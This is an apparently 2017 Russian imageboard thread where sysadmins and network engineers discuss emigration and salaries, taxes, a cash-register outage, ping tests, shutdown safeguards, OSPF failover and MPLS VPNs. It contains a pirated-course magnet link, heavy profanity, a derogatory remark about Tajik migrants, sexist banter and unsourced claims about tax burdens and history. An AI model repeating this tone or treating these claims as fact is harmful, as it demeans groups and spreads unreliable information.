Это слишком сложный вопрос, чтобы на него можно было вообще ответить. Сколько людей - столько и историй...

Есть те, кто здесь работали на заводах всякими ведущими инженерами и получали копейки, уехали туда и там работают тоже на заводах, но обычными работягами. Живут спокойно, ни в чем нужды не испытывают и уверены, что на пенсии не будут голодать. С одной стороны это такой профессиональный дауншифт, с другой они уровень своей жизни при этом явно улучшили...

Бывают, кто едет без образования и навыков - работает там в сфере обслуживания (официант, фастфуд) и если здесь им приходилось выживать на копейки, то там они имеют тот же уровень жизни без всяких напрягов.

А вот тех, кто бы имея здесь высокий уровень жизни, уехав, значительно бы его улучшил и правда мало - в основном топовые востребованные специалисты. Однако всё равно - это уровень среднего класса, миллионером что здесь, что там, работая на дядю, стать невозможно - не нужно себя обманывать! Другое дело, что там больше возможностей для открытия бизнеса, для инвестирования, для того, чтобы банально накопить хоть какой-то начальный капитал.

Хотя сами, что американцы, что европейцы, при всём при этом живут 100% в кредит, который автоматически закрывается работодателем, путем зачисления зарплаты на кредитный счет. ЛОЛ, да? Просто людям в голову не приходит, что можно напрячься, накопить денег и начать инвестировать/вести свое дело - зачем, если они уже хорошо живут и уверены в том, что будут обеспечены в старости? Плюс там нет такого расслоения по доходам в обществе как у нас, т.е. люди менее завистливые и у них меньше мотивации стремиться сделать головокружительную карьеру и/или стать миллионерами.
Аноним 20/12/17 Срд 13:15:39 #159 №1153402 
snimokekranaot2017-10-3116-51-54-600x741.png
>>1153394
Там есть понятие среднего класса, вот старый пик, типа % от зарплаты цены iphone x в разных странах.
Если тут я считаюсь успешным с своими жалкими 120к в месяц, за которые убиваюсь на двух работах, то в США - 3к долларов - это зарплата охранника.
Многие начнут спорить о том, что там американцы платят из налоги, подавая каждый год декларацию, могу парировать тем, что в рашке мы помимо 13% из ЗП платим ещё 30% от работодателя на каждый выплаченный рубль, итого с 100к государство в чистом виде получает 43к, а на оставшиеся 87к рублей (100к -13%, и 30% взносов от работодателя) мы покупаем товары и услуги с 18% НДС, фактически из выплаченных суммарно 143к работодателям мы имеем только 71400, ага, маньки, это чуть меньше половины средств
И это гениально работает, так как рабы не думают о том, сколько на самом деле государство с них берёт денег.
Так вот, возвращаясь к среднему классу, по всем критериям среднего класса, я с своими жалкими 120к в месяц даже близко не могу с ним стоять, мне как минимум надо увеличить зарплату в два раза, чтобы я мог быть среднем классом, с поправкой на курс, в свою очередь будучи виндоцисколинуксоидом я бы мог получать больше примерное в 1.5-2 раза
https://www.tupa-germania.ru/rabota/zarplata-it-germania.html

Да, там были бы другие цены, что-то дешевле, что-то дороже, но я был бы уверен, что мои фантики деньги будут иметь покупательскую способность, что если я останусь без работы моё государство меня не бросит, короче был бы более социально защищён
Аноним 20/12/17 Срд 13:26:05 #160 №1153415 
>>1153402
В ДС и ДС2 уровень жизни примерно сопоставим с Европейским. А чаще и выше, чем европейский. Это факт.
Касательно США соглашусь. Но если ты из ДС и работаешь за 120к и имеешь жилье, то есть ли смысл перекатываться в США, снимать там хибару, не иметь толком друзей и быть мигрантом из России? Сомневаюсь.
Аноним 20/12/17 Срд 13:40:00 #161 №1153428 
Откуда они, блядь, лезут?!
https://reestr.minsvyaz.ru/reestr/87473/
Аноним 20/12/17 Срд 13:43:14 #162 №1153431 
1474718409138792380.jpg
>>1153428
Ulyanovsk.Berkeley Software Distribution
Аноним 20/12/17 Срд 13:48:24 #163 №1153433 
https://www.gazeta.ru/business/news/2017/12/20/n_10958084.shtml

В России произошел крупный сбой в работе кассовых аппаратов. Об этом сообщает РИА «Новости».

Уточняется, что из-за поломки закрыли часть магазинов российского ретейлера «Магнит». С подобными проблемами столкнулись и заправки «ЛУКойла», «Газпром нефти», а также сети магазинов «Мария-Ра», «Аникс», «Ярче», «Автоштрих» и DNS.

В Федеральной налоговой службе рассказали, что в таком случае торговые точки вправе проводить расчеты без этой техники. Однако после того как система вновь заработает, продавцы обязаны будут сформировать кассовый чек коррекции с общей суммой неучтенной выручки.

В свою очередь в компании Group-IB пояснили, что массовый сбой касс мог произойти из-за проблем в прошивке нового ПО.


____________________
____________________

Никто не работает с кассовым оборудованием? Что это было?
Аноним 20/12/17 Срд 13:50:12 #164 №1153437 
>>1153415
Живу в ДС с женой, суммарно зарабатываем 150к. Сестра жены живет в пригороде Вены, работает полдня. Так вот они с мужем суммарно и зарабатывают намного больше и живут заметно лучше. Интересно, что мы в ДС делаем не так?

>>1153402
Про налоги у нас ты хорошо, что напомнил. Действительно это грабеж самый натуральный. Чтобы платить сотруднику 100к в месяц на руки, работодатель должен еще около 60к заплатить государству. При этом все товары стоят на 18% дороже из-за НДС. Т.е. получается, что с каждого созданного нашим трудом рубля, государство забирает себе почти три четверти... Налог в 75% - это что-то с чем-то. Не удивительно, что он поделен на части и сокрыт от простых людей, ведь если человеку выдать на руки 100к, а потом заставить 75к сдать обратно - люди сразу поймут что к чему!
Аноним 20/12/17 Срд 13:50:16 #165 №1153438 
>>1153415
Ну, я пока никуда и не еду, вот когда Рамзан станет президентом, после Пыни, тогда смажу анус лыжи, и поеду
Аноним 20/12/17 Срд 13:50:55 #166 №1153440 
>>1153433
Нас задело, но что это было - ХЗ, проблема на стороне кассового ПО.
Аноним 20/12/17 Срд 15:03:32 #167 №1153506 
>>1153428
Давеча тут упоминался некий мерзкий чЯтик, который зачем-то купили на смену исправно работавшему жабберу. В Реестре его нет, 100%. А вот чего в Реестре нашел: https://www.dlg.im/ru/download/enterprise
Кто-то использовал, не? Просто клиент доступен, а сервер по запросу, даже цены нет.
Аноним 20/12/17 Срд 15:58:34 #168 №1153539 
>>1153218
>>1153302
Спасибо.
А пинг есть, но СКОРОСТИ НЕТ?
Аноним 20/12/17 Срд 15:58:49 #169 №1153540 
>>1153506
Практика показывает, что запретить людям пользоваться теми чатиками, которыми они привыкли, - абсолютно нереальная задача. Хуже того, та же слака настолько удобна и функциональна, что ни одна закрытая альтернатива не может сравниться. И это касается любого популярного социального ПО. Силовые попытки запрета, обычно, выливаются в нелояльность со стороны продвинутых и прошаренных сотрудников и их стремительный отток из компании...
Аноним 20/12/17 Срд 15:59:29 #170 №1153543 
>>1153388
Эбать, это реальный график? Чет не верю.
Аноним 20/12/17 Срд 16:02:09 #171 №1153548 
>>1153543
Так это ты еще графика приезжающих не видел! Вот только если уезжают молодые специалисты выпускники топовых ВУЗов, то приезжают таджики всякие...
Аноним 20/12/17 Срд 16:12:44 #172 №1153559 
>>1153548
Вузы в стране в год выпускает миллион специалистов. Каждый третий из них - из топовго ВУЗа?
Аноним 20/12/17 Срд 16:17:16 #173 №1153562 
>>1153559
Я бы поделил московские технические ВУЗы на 4 ранга:
S - МГУ (мехмат, ВМК, физфак), Физтех
A - Бауманка, МИФИ...
B - МИРЭА, МАИ...
C - все прочие

Так вот A и S - это топовые. Некоторые специальности, некоторых факультетов в B - тоже топчик. То есть в ДС от трети до половины всех выпускников технарей попадают в категорию выпускников топовых ВУЗов.
Аноним 20/12/17 Срд 16:20:11 #174 №1153564 
>>1153562
>. То есть в ДС от трети до полов
я бы переделал на:
S - МГУ (мехмат, ВМК, физфак), Физтех
A - Бауманка, МИФИ...
С - прочее, всё равно что.
Аноним 20/12/17 Срд 16:20:53 #175 №1153565 
только причем тут админ? Админ это уровень техникума.
ВУЗ это для разработчиков
Аноним 20/12/17 Срд 16:27:19 #176 №1153572 
>>1153564
Ну это меньше соответствует реалиям. Сам заканчивал МИРЭА - там на одной кафедре давали просто потрясающую подготовку по тем то временам! А на соседней кафедре не учили вообще ничему...

>>1153565
Годовой курс дискретной математики. Курс архитектуры сетевых протоколов и отдельный курс сетей. Отдельные семестровые курсы по функциональному и процедурному программированию, а также два семестра ассемблера и ООП. Годовой курс по архитектуре операционных систем (на примере unix).

Короче, помимо программирования у меня была и приличная такая база общеайтишных предметов. При том эта подготовка была одинаковой и для АСУшников, и для кодеров, и для всех остальных на IT факультете (тогда в МИРЭА он еще ВМС назывался, если что).
Аноним 20/12/17 Срд 16:28:15 #177 №1153574 
>>1153539
>А пинг есть, но СКОРОСТИ НЕТ?
ping -f 8.8.8.8 -l 1400
Аноним 20/12/17 Срд 16:32:15 #178 №1153578 
>>1153574
>ping -f 8.8.8.8 -l 1400
Ну пингует он, а толку? Скорости нет почти (допустим).
Аноним 20/12/17 Срд 16:45:12 #179 №1153586 
>>1153540
Госконтора же. Иначе стал бы я в реестр Минсвязи лазить. А силовая замена состоялась раньше, при внедрении мерзкой хуиты вместо жабы. Хуиты нет в реестре, а это есть. Может, и слак есть, не долистал пока.
Аноним 20/12/17 Срд 16:50:21 #180 №1153588 
>>1153578
Дурак что ли? Пинг с длинной пакета 1400, смотри на задержку и потери
Аноним 20/12/17 Срд 16:59:10 #181 №1153589 
>>1149761 (OP)
>Курс CCNA: magnet:?xt=urn:btih:B0B3726CA5E04ECEC1937DBCF88BD733401BAF5D&dn=INE CCNA 200-120 videos 2014&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80&tr=http%3a%2f%2fretracker.hq.ertelecom.ru%2fannounce
>2014
Что-нибудь по-современнее есть?
Аноним 20/12/17 Срд 17:05:13 #182 №1153592 
>>1153588
>Pinging 8.8.8.8 with 1400 bytes of data:
Reply from 8.8.8.8: bytes=1400 time=115ms TTL=50
Reply from 8.8.8.8: bytes=1400 time=114ms TTL=50
Reply from 8.8.8.8: bytes=1400 time=115ms TTL=50
Reply from 8.8.8.8: bytes=1400 time=115ms TTL=50

Ping statistics for 8.8.8.8:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 114ms, Maximum = 115ms, Average = 114ms
Аноним 20/12/17 Срд 17:11:12 #183 №1153597 
>>1153592
Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57
Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57
Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57
Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57

А не дохуяли у тебя отклик?

У меня самое большое, что было на MGTS по 10 мс
Аноним 20/12/17 Срд 17:31:06 #184 №1153601 
Начитался тут смехуечков про halt по ssh. И вот какой вопрос: а защита от дурака есть? Т.е. пользователю с правом на, допустим, halt, при вводе halt хотя бы выдавался запрос на ввод пароля, причём не пользовательского, а на конкретную операцию. И только после этого, убедившись, что пользователь трезв и в своём уме, система бы выполняла именно то, что приказали. Необязательно halt, другие критичные команды.
Аноним 20/12/17 Срд 17:41:19 #185 №1153605 
>>1153601
Ты можешь с халта убрать пермишены, тащемта есть ещё и poweroff и reboot
Аноним 20/12/17 Срд 17:44:43 #186 №1153608 
>>1153601
root@TEST:/# ls -la /sbin/ | grep halt
lrwxrwxrwx 1 root root 14 Oct 26 14:59 halt -> /bin/systemctl
Вот, сделай его chmod только для рута, типа как 600, и хватит
Аноним 20/12/17 Срд 17:46:38 #187 №1153609 
>>1153605
Это понятно. Разрешения меняются не в целом, а в зависимости от того, вошли мы локально или удаленно? По-любому должна быть такая фишка. Уж если винда в терминальной сессии предупреждает: вы не разлогиниться собрались, а выключить меня, потом придётся прийти и включить кнопкой.
Аноним 20/12/17 Срд 17:51:28 #188 №1153612 
>>1153608
См. выше. Возможно, пользователю и разрешено это, но тогда, когда есть шанс все исправить с прямым доступом. Не только выключение. Так, можно радостно включить ненастроенный файерволл с единственным правилом deny all.
Аноним 20/12/17 Срд 17:58:12 #189 №1153615 
>>1153612
>Так, можно радостно включить ненастроенный файерволл с единственным правилом deny all.
Да, было дело, я уже как-то так включал по молодости

Ну тогда сложный вариант: molly-guard
Аноним 20/12/17 Срд 17:58:46 #190 №1153616 
>>1153612
http://www.ubuntugeek.com/molly-guard-protects-machines-from-accidental-shutdownsreboots.html

Даже ссылку тебе нагуглил
Аноним 20/12/17 Срд 17:59:17 #191 №1153617 
>>1153609
>>1153608
А нормальные люди по ссх под рутом не ходят.
Аноним 20/12/17 Срд 18:01:29 #192 №1153618 
>>1153617
>нормальные люди
Кто тебе сказал, что я нормальный, но тащемта да, тут ты прав, в любом случае, я не помню требует шутдаун судо или нет
Аноним 20/12/17 Срд 18:03:05 #193 №1153620 
>>1153618
Требует-требует. В деб-подобных точно.
Аноним 20/12/17 Срд 18:05:32 #194 №1153623 
>>1153620
я просто или на центе сижу или на фряхе, кек, как старик, а вот убунты уже сто лет как не видел
Аноним 20/12/17 Срд 18:14:00 #195 №1153628 
82646188svitermolliuizli.jpg
>>1153616
Спасибо, почитал. Надо будет сам скрипт почитать тоже, попозже.
P.S. Казалось бы, при чем тут Молли?
Аноним 20/12/17 Срд 20:16:48 #196 №1153678 
Зовут на одинаковую зп в Москву и Питер. Куда лучше деться?
Аноним 20/12/17 Срд 20:26:25 #197 №1153682 
>>1153437
> Интересно, что мы в ДС делаем не так?

Зарабатываете на двоих всего 150k, разумеется
Аноним 20/12/17 Срд 22:08:06 #198 №1153790 
>>1153678
Единственное преимущество Питера - более доступная аренда жилья. Нехуй думать, едь в Москву.
Аноним 21/12/17 Чтв 01:05:55 #199 №1153846 
Как искать работу студентишку? Входные данные - полгода опыта и умение писать фронт на vue, знакомство с реактом ну и плюс всякая кроссбраузерная, адаптивная и прочая верстко-хуйня, а еще скиллы питона с джангой. Хочу устроиться хоть стажером, хоть джуном, на парт-тайм часов 30-35 в неделю
но на хх полторы вакансии с частичной занятостью или стажировкой, мб я что-то не так ищу?
хелп ми, аноны :с
Аноним 21/12/17 Чтв 06:38:55 #200 №1153866 
>>1153846
По знакомству. Дураков выкладывать вакансии для студней на ХХ, а потом отбиваться от долбоебов нет. Нет друга, который приведет тебяв контору за ручку, пиздуй в телеграм чат по своему вую и просись на стажировку.
Аноним 21/12/17 Чтв 06:49:15 #201 №1153868 
>>1153678
Похуй, ценник на жизнь что там что там однохуйственный.
>>1153790
В Питере жизнь спокойнее, москвичи бегают как в жопу выебанные и вечно никуда не успевают.
Аноним 21/12/17 Чтв 08:08:46 #202 №1153885 
Живя в Москве, надо зарабатывать никак не меньше
> 140000 руб., в идеале - 180-240 тыс.руб.
иначе ты нищенка. Выпились лучше из города!
Аноним 21/12/17 Чтв 09:04:55 #203 №1153897 
>>1153678
в ДС, конечно, тут возможностей больше, сможешь поменять работу на ещё более выгодную спустя пару месяцев, а Питер он как был провинцией, так и осталя
Аноним 21/12/17 Чтв 19:26:41 #204 №1154103 
Сетевики, это что же получается, если наша компания, к примеру, прикупила блок адресов, нам не обязательно их всех анонсировать в BGP?
Аноним 22/12/17 Птн 00:07:37 #205 №1154194 
>>1149761 (OP)
поясните как именно зарубили в ссср наше направление микроэлектроники и кибернетического развития? читал где то книгу (па психалогии кажись) в которой чувак приводил рассказ другого чувака как он в 60-х годах бегал по всем высшим советам (он имел туда вход) и кода решался вопрос развития этой отрасли - русские (совки ващет) решили что это НЕ НУЖНО. что это бесовщина. и типа чувак тот, который метался и жопу рвал что бы это развивали - вот тогда он понял как тупо и дебильно устроено общество. как оно психически нездорово.

помните такую книги? что можете за тему пояснить? интересую конкретные воспоминания, статьи, источники, пруфы.

мы могли бы не уступать муррике в этом направлении развития если бы не решили сами свернуть наш проект (который кстати опережал их)
Аноним 22/12/17 Птн 09:12:38 #206 №1154246 
>>1154103
Ну как бы да. Хотя формально вы должны как раз отчитаться, что вообще эти адреса используете, вплоть до того, что расписать для чего вам какой адрес, т.е. обосновать RIPE, что они вам нужны. Плюс провайдер не примет от вас анонсы слишком коротких префиксов, т.е. если ваша аска маленькая, то придется анонсировать ее всю или половину/четверть. Наконец, в чем смысл зажопить часть адресов? Внутри вы можете и серыми пользоваться.
Аноним 22/12/17 Птн 10:00:22 #207 №1154258 
>>1153572
Заканчивал СибГУТИ в Новосибирске, программа образовательная похоже что была точно такой же как у тебя. Только ещё матанализ и векторная алгебра были.
Аноним 22/12/17 Птн 10:04:22 #208 №1154260 
>>1154258
Линейка и матан у нас тоже, конечно, были - по два года, а также еще по семестру: ТФКП и диффуров. Ну и три семестра физики. Но это всё к IT не относится - в любом техническом ВУЗе примерно такие же объемы математики.
Аноним 22/12/17 Птн 11:01:56 #209 №1154285 
изображение.png
>>1154246
>если ваша аска маленькая, то придется анонсировать ее всю или половину/четверть
Аноним 22/12/17 Птн 11:05:42 #210 №1154288 
>>1154194
>поясните как именно зарубили в ссср наше направление микроэлектроники и кибернетического развития

Гугли ОГАС Глушкова, я хуй его знает.
Аноним 22/12/17 Птн 20:23:00 #211 №1154568 
>>1154194
>>1154194
>поясните как именно зарубили в ссср наше направление микроэлектроники и кибернетического развития?

В кратце из новейшей истории России:
Для промышленности PLC совок пилил сам, и пилил заводы автоматические и как китай копировал гейропейские и пиндоские. т.е купили линию автоматического производства хуйни и накопировали тысячи, и свои PLC туда насовал и институты по разработке. С развала совка siemens понял что ему эта конкуренция нахуй не нужна и с помощью взяток, демпинга и нечестной конкуренции завалил институт по разработке промышленной автоматики.
Аноним 22/12/17 Птн 20:27:41 #212 №1154571 
15f35ad5595845f88bf1385b6034be38.JPG
Аноним 22/12/17 Птн 21:58:02 #213 №1154636 
>>1153374
Я умею настраивать роутеры. Пока этого вполне достаточно, поверь. Хотя, вот, думаю разобраться и со свичами. Научиться и их настраивать )
Аноним 22/12/17 Птн 23:05:48 #214 №1154684 
>>1154636
>разобраться и со свичами. Научиться и их настраивать )
Там где нужно настраивать свичи, твоих знаний по настройке "роутеров" поднять PPPoE, DHCP, WiFi и тыкнуть на save - это нихуя не умение настраивать роутеры блядь!
будет недостаточно.
Аноним 23/12/17 Суб 06:36:07 #215 №1154763 
>>1154684
ты, пожалуйста, не оценивай не зная меня мое умение настраивать роутеры. А я, если хочешь, могу рассказать, чего именно я не знаю про настройку свитчей, что не умею итд. Я вообще-то сейчас говорил о том, что мои знания в датацентрах равны примерно нулю. А не про вланы, спаннинг три, кос и прочий mclag...
Аноним 23/12/17 Суб 10:51:53 #216 №1154796 
40-летний таксист из Тамбова стал программистом

https://habrahabr.ru/sandbox/113130/

Метки: scala, java, c++, haskell, 1c
Войти в айти не хотите ли?
Аноним 23/12/17 Суб 11:33:00 #217 №1154805 
>>1154796
Красиво, но больше похоже на вброс.
Аноним 23/12/17 Суб 11:43:31 #218 №1154806 
>>1154796
Согласен.
Тем более сказки о том, что бывшему таксисту-1Сснику предложили сразу прийти на 210к разработчиком С
Аноним 23/12/17 Суб 14:18:05 #219 №1154839 
>>1154796
Это зазывала, вот рискнуть написать сказку про вояку с 40летнипм опытом в казарме ставшим программистом никто не станет.
Аноним 24/12/17 Вск 03:08:19 #220 №1155091 
image.png
Вот такая вот сетка есть, сетевики.
RTR1 и RTR2 находятся в AREA0 OSPF. STACK находится в stub-AREA1. Оба RTR анонсируют STACK маршруты по-умолчанию с разными метриками: RTR1 - 100, RTR2 - 200.
Каждый RTR подключен к своему провайдеру. На обоих RTR включен тест IP SLA до дефолтного шлюза провайдера.

Что сейчас: весь трафик из LAN в Интернет идёт, очевидно, через RTR1. Если WAN-интерфейс RTR1 отказывает, то этот трафик всё равно идёт в Интернет через RTR1, который перенаправляет их на RTR2, ну а тот уже шлёт пакеты куда надо. Всё это происходит, потому что анонсы LSA3 дефолтных маршрутов для stub-зон не зависят от наличия на анонсирующем ABR маршрута по-умолчанию, и STACK нихуя не узнаёт о том, у его дефолтного шлюза уже нет маршрута в Интернет.

Что нужно: если дохнет провайдер RTR1, STACK начинает использовать в качестве шлюза по-умолчанию RTR2.

Чего не хочется:
1. Делать AREA1 нормальной зоной с последующим анонсированием обоими RTRами маршрутов по-умолчанию с помощью LSA5;
2. Перебарщивать со списками контроля анонсов.

Такие дела, коллеги. Пока что склоняюсь к решению плюнуть на это дело, ибо время хождения пакета по сети увеличивается не так уж и сильно. Но, всё-таки, чёт НИКРАСИВА мне.
Аноним 24/12/17 Вск 16:28:32 #221 №1155310 
Посоны, а вы встречали тяночек системных администраторок? Или сетевых инженерок? Короче, чтобы возились с компьютерами и сетями. И чтобы не жирухи/фемки/лесби были
Аноним 24/12/17 Вск 16:34:43 #222 №1155312 
>>1155310
Да, есть знакомая сетевик.
Аноним 24/12/17 Вск 16:44:47 #223 №1155315 
>>1155312
Ну и как она из 10? Няшная? Есть кунчик? Какой рост/вес?
Аноним 24/12/17 Вск 16:49:30 #224 №1155321 
>>1155315
Обойдешься
Аноним 24/12/17 Вск 16:57:06 #225 №1155325 
>>1155321
Блин. Ну вот так всегда. А как же хочется няшную системную администраторочку, чтобы няшиться с ней ночными сменами на диванчике в серверной под синтвейв в свете мигающих светодиодных индикаторов...
Аноним 24/12/17 Вск 16:59:44 #226 №1155327 
73e.gif
>>1155325
> :[
Аноним 24/12/17 Вск 23:01:07 #227 №1155599 
15076567504060.jpg
>>1149761 (OP)
может, задам платиновый вопрос, но:
что из IT учить, если я не собираюсь полностью становиться погромистом? Работаю в офисе, международная торговля, есть время учить всякое, но не уверен, есть ли язык программирования, который пригодится неайтишнику. Мне один знакомый говорит, SQL обмазываться, но он сам только учить начал, сам продаваном работает, поэтому я у вас лучше спрошу. Перефразируя вопрос, знание какой IT области сделает меня более ценным специалистом в "аналоговых" специальностях, типа логистики, аудита, хуй знает куда ещё занести может, но вы поняли.
Аноним 24/12/17 Вск 23:03:39 #228 №1155601 
>>1155599
Ну, если рассуждать логически, то не чистому айтишнику нужны от айти в первую очередь инструменты автоматизации какой-нибудь своей автоматизируемой рутины. Следовательно нужно что-то максимум прикладное, чтобы решать подобные задачи. Из всех ЯП что я знаю (я на самом деле нихуя не спец) самый прикладной питон. его и учи, дальше не пропадёшь.
Аноним 24/12/17 Вск 23:07:42 #229 №1155605 
>>1155601
А что, новичок может начать с питона прямо? У меня из опыта только html 4 много лет назад.
Аноним 24/12/17 Вск 23:10:16 #230 №1155606 
>>1155605
А питоне не сложный, да и сделан как раз так чтобы с него начинать. Ну, если верить книжкам от О'Рейли.
Аноним 24/12/17 Вск 23:16:04 #231 №1155613 
>>1155606
окей, благодарю за совет.
Аноним 25/12/17 Пнд 01:55:30 #232 №1155639 
>>1149761 (OP)
Где можно найти удаленку part time маня админу-сетевику? Могу циски и жужиперы, могу пердолить линухи немного и писать всякое говно на питоне
Аноним 25/12/17 Пнд 01:58:00 #233 №1155640 
>>1155639
И да, вышки неть
Аноним 25/12/17 Пнд 08:06:07 #234 №1155661 
>>1155325
>няшную системную администраторочку
нет их няшных.
Аноним 25/12/17 Пнд 08:09:41 #235 №1155663 
>>1155639
>Где можно найти удаленку part time маня админу-сетевику?
Ох уж и не знаю. Пытался я как-то найти подобное.
Но это либо настройка д-линка за три копейки, либо компьютерная помощь.
Админом можно на удаленке разве что линукс пердолить. Сетевиком найти довольно проблематично. Во всех компаниях, где нужны сетевики, они уже есть в штате. А там, где сетевики не нужны на фул тайм, они и на парт тайм не нужны.
Аноним 25/12/17 Пнд 09:02:22 #236 №1155667 
>>1155091
Зачем тебе вообще здесь две зоны оспф? Разрулить ситуацию можно либо с помощью протоколов HSRP/GLBP, либо с помощью технологии OER/PFR. Последнюю, настоятельно рекомендую.
Аноним 25/12/17 Пнд 09:08:21 #237 №1155668 
>>1155606
>питоне не сложный
Я тоже так думал, пока не столкнулся с лямбдами в декораторах для обертывания конструкторов/методов в ООП. Конечно, можно этим и не пользоваться, но тогда и рассчитывать на приличную работу не стоит. Плюс
в пайтоне дохуя либ, без знания которых этот язык просто нахуй не нужен.
Аноним 25/12/17 Пнд 09:09:44 #238 №1155670 
>>1155091
>аршрутов для stub-зон не зависят от наличия на анонсирующем ABR маршрута по-умолчанию, и STACK нихуя не узнаёт о том, у его дефолтного шлюза уже нет маршрута в Интернет.
Как насчет того, чтобы использовать reliable conditional default routing?
Аноним 25/12/17 Пнд 09:11:21 #239 №1155671 
>>1155668
>Конечно, можно этим и не пользоваться, но тогда и рассчитывать на приличную работу не стоит. Плюс
>в пайтоне дохуя либ, без знания которых этот язык просто нахуй не нужен.
Я так понял, что анон, который изначально задал вопрос, вообще не работает в ИТ. Так что он и не планирует работать программером.
Я правда не понимаю, зачем ему вообще что-то подобное изучать. Не проще ли сосредоточится на своих хард скиллз
Аноним 25/12/17 Пнд 09:38:32 #240 №1155682 
15117471271593.png
15117471271592.png
15117471271591.png
15117471271540.png
Двачерсы, поясните мне про L2 VPN, про всякие там VPLS или MPLS и IPoE, вот с L3 VPN уровня point TO point всё ясно, есть сервер, есть клиент, начал читать про VPLS и в ужасе охуел насколько это сложно, сложнее любого BGP.
Короче, объясните как для пятилетнего, что это как и куда работает, можете подогнать сравнительный анализ, в чём плюсы и тп, вообще расскажите для тупого и с самого начала, где используется в чём плюхи в отличии от L3, я так полагаю, плюхи в том, что удобен при site to site
Аноним 25/12/17 Пнд 10:06:40 #241 №1155692 
>>1155682
>плюхи в том, что удобен при site to site
потерял мысль и отвлёкся, я у мамы аутист
Аноним 25/12/17 Пнд 10:18:59 #242 №1155695 
>>1155682
Про то как работает vpn в MPLS сетях я тебе не расскажу - сам не знаю. Но L3 от L2 в данном случае отличается только одним - в первом случае ты гонишь по своей провайдерской сети ip кадры, а во втором - эзернет фреймы. Сама MPLS сеть при этом никак не меняется, только инкапсуляция.

Преимущество L2vpn очевидно - тебе не нужно делать маршрутизацию внутри своей сети, т.е. удаленные площадки будут в одном L2 сегменте - всякие виндовые файлшары будут работать, как будто компы рядом стоят.

>>1155671
Хард скилы важны, конечно, но со временем без навыков автоматизации и программирования будет всё сложнее и сложнее найти хорошую работу - сети, серверные, ПО растут и усложняются постоянно при том по экспоненте, соответственно, старые подходы к управлению и администрированию с каждым днем всё менее и менее эффективны. И пайтон - отличный старт, чтобы окунуться во всё это, но не нужно думать, что это простой язык. Если уж учить язык, то серьезно, иначе просто не получится его эффективно использовать в работе.
sageАноним 25/12/17 Пнд 10:24:01 #243 №1155698 
Что-то я последнее время стал зависать на принятии элоементарных решений. Чаю выпить или кофе? Надеть синюю рубашку или серую водолазку? Сейчас выбираю, какой Windows Server 2016 ставить, русский или английский. Прям выбор века, блеадь. Раньше обычно английские ставил. Но тут на работе уже два сервера под виндой есть и оба русскоязычные, как-то не хочется увеличивать зоопарк языков. Зато английский привычнее. Но сейчас на 2000 год, когда у локализованных систем была куча глюков и жмячне было ставить "чистую" английскую. Сейчас они все "чистые".
Аноним 25/12/17 Пнд 10:27:03 #244 №1155699 
>>1155695
>тебе не нужно делать маршрутизацию внутри своей сети
То есть оно будет как буд-то единые ВЛАНЫ и тп? Я смогу гнать, условно, VLAN 10 из одного филиала в VLAN 10 в другом филиале, используя транки, и это всё будет работать как локальная сеть?
Но вроде как всякие OpenVPN тоже могут передавать теги вланов.
Ладно, в одном случае инкапсулируется фрейм, а куда, в UDP пакет? или куда его суют? В другом случае сам пакет, так же суётся в другой UDP?
Аноним 25/12/17 Пнд 10:45:53 #245 №1155707 
>>1155699
Да, это будет как единый L2 сегмент - хочешь можешь одни и те же вланы между площадками растягивать.

Куда там что инкапсулируется не знаю, но там всё несколько сложнее. Суть в том, что под каждого клиента заводится свой vrf в него заворачивается клиентский трафик, внутри же сети обычно нет bgp, а используется маршрутизация по меткам LSP, что и является основой MPLS сети при том для каждого клиентского vrf свои тунели строятся, т.к. точки подключения к провайдеру у разных клиентов не совпадают, очевидно. Использование меток позволяет ускорить маршрутизацию и иметь внутри провайдерской сети оборудование без BGP - это дешевле и сама сеть более простая. Ну а vrf-ы позволяют разделить трафик клиентов, чтобы он не пересекался.
Аноним 25/12/17 Пнд 10:49:20 #246 №1155709 
>>1155707
>внутри же сети обычно нет bgp
Оно там есть конечно, но только на пограничных маршрутизаторах.
fix
Аноним 25/12/17 Пнд 12:04:31 #247 №1155756 
>>1155709
>Оно там есть конечно, но только на пограничных маршрутизаторах.
а как же утверджение "BGP is the BESP IGP"?
В ДЦ сетях активно продвигается BGP в качестве внутреннего протокола маршрутизации. Со всеми этими Spine-leaf топологиями
Аноним 25/12/17 Пнд 13:55:31 #248 №1155870 
>>1155756
Ну в spine-leaf ты по-другому и не сможешь организовать масштабирование. Но в провайдерских сетях из многих сотен и тысяч маршрутизаторов держать BGP на каждом из них просто невозможно - там же для iBGP нужно соседство каждого с каждым, ну или конфедерации и роут-рефлекторы внутри них. MPLS для того и придумали, чтобы не использовать BGP внутри сети.

>BGP в качестве внутреннего протокола маршрутизации
Это верно только для транзитных AS в контексте передачи маршрутов в интернет. Раньше была практика их передачи через IGP, но это было ну очень-очень давно. Что до iBGP, то без IGP он как бы всё равно не заработает, так что OSPF или ISIS никто не отменял внутри сети.
Аноним 25/12/17 Пнд 14:01:48 #249 №1155878 
>>1155682
> Двачерсы, поясните мне про L2 VPN, про всякие там VPLS или MPLS и IPoE, вот с L3 VPN уровня point TO point всё ясно, есть сервер, есть клиент, начал читать про VPLS и в ужасе охуел насколько это сложно, сложнее любого BGP.
> Короче, объясните как для пятилетнего, что это как и куда работает, можете подогнать сравнительный анализ, в чём плюсы и тп, вообще расскажите для тупого и с самого начала, где используется в чём плюхи в отличии от L3, я так полагаю, плюхи в том, что удобен при site to site
Ты собрался идти к провайдеру?
Аноним 25/12/17 Пнд 14:13:50 #250 №1155894 
>>1155878
>Ты собрался идти к провайдеру?
Упаси боже хотя хуй его знает, что там в будущем, просто хочу разобраться с сетями на уровне CCNA, ну такой, базовый уровень сетевика чтобы стать шивой, всякие STP, OSPF можно встретить ирл, а вот л2впн с MPLS я не встречал, а ведь интересно
Аноним 25/12/17 Пнд 14:36:58 #251 №1155911 
>>1155894
На уровне CCNA лучше не лезь даже в MPLS и BGP. Всё равно до конца сейчас не разберешься, а где-нибудь на собеседовании какую-нибудь глупость возьмешь да и ляпнешь. Некоторые вещи лучше не знать вообще, чем знать плохо.
Аноним 25/12/17 Пнд 14:50:56 #252 №1155916 
>>1155911
